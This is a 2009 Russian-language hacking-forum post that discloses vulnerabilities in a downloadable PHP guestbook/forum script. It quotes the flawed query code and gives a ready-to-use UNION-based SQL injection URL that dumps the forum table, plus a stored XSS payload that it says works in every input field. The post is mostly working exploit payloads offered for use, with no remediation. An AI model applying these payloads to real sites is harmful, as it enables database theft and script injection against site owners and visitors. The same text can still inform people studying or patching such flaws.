
04.03.2009, 23:54
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Гостевая книга.
код: http://dump.ru/file/1946627
1. SQL inj
бажный код:
PHP код:
$result=mysql_query("SELECT id,msg,ans,author,topic,date,host,email FROM $tb WHERE ans=".$ref." ORDER BY id desc");
не фильтруются передаваемые даные.
exploit:
Код:
http://localhost/forum/forum.php?cmd=show&id=-6+union+select+group_concat(concat_ws(0x3a,id,msg,ans,author,topic,date,host,email,url))+from+forum--
татие скули почти во всех параметрах!
2. Активная XSS.
Ну здесь уязвимы все поля...
вл любом из них вводим
Код:
"><script>alert(0x646f63756d656e742e636f6f6b6965)</script>
и видим куки)
Сильно не пинайте, знаю, что гостевая - один сплошной баг, но всеже решил опубликовать...
------------------------------------------------------------
The End!
Последний раз редактировалось -m0rgan-; 04.03.2009 в 23:58..
|
|
|